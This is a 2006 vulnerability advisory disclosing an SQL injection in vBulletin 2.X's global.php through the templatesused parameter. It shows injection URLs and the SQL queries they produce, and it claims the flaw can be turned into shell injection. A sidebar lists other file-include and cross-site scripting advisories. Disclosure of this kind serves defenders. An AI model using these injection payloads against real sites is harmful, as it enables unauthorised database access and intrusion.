Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

WebspotBlogging => 3.0 Remote File Include Vulnerabilities

DanPHPSupport => 0.5 Cross Site Scripting Vulnerabilities

QB ( QuickBlogger ) =>1.4 Remote File Include Vulnerabilities

php_news => 2.0 Remote File Include Vulnerabilities

From:	HACKERS PAL <security_(at)_soqor.net>
Date:	27.09.2006
Subject:	Vbulletin 2.X sql injection

Hello,,

Vbulletin 2.X sql injection

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net

This is sql injection in vbulletin systems

the injection is in the global.php file

we can use it

global.php?templatesused=))/*

the query will be
SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone',
'username_loggedout','username_loggedin','phpinclude',
'headinclude','header','footer','forumjumpbit',
'forumjump','nav_linkoff','nav_linkon','navbar',
'nav_joiner','pagenav','pagenav_curpage',
'pagenav_firstlink','pagenav_lastlink',
'pagenav_nextlink','pagenav_pagelink',
'pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

global.php?templatesused=nn,dd,'))/*
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*',
'gobutton','timezone','username_loggedout',
'username_loggedin','phpinclude','headinclude',
'header','footer','forumjumpbit','forumjump',
'nav_linkoff','nav_linkon','navbar','nav_joiner',
'pagenav','pagenav_curpage','pagenav_firstlink',
'pagenav_lastlink','pagenav_nextlink','pagenav_pagelink',
'pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

It Can be used as shell injection

Tested on VB 2.3.X and other versions are injected ..(2.X)

#WwW.SoQoR.NeT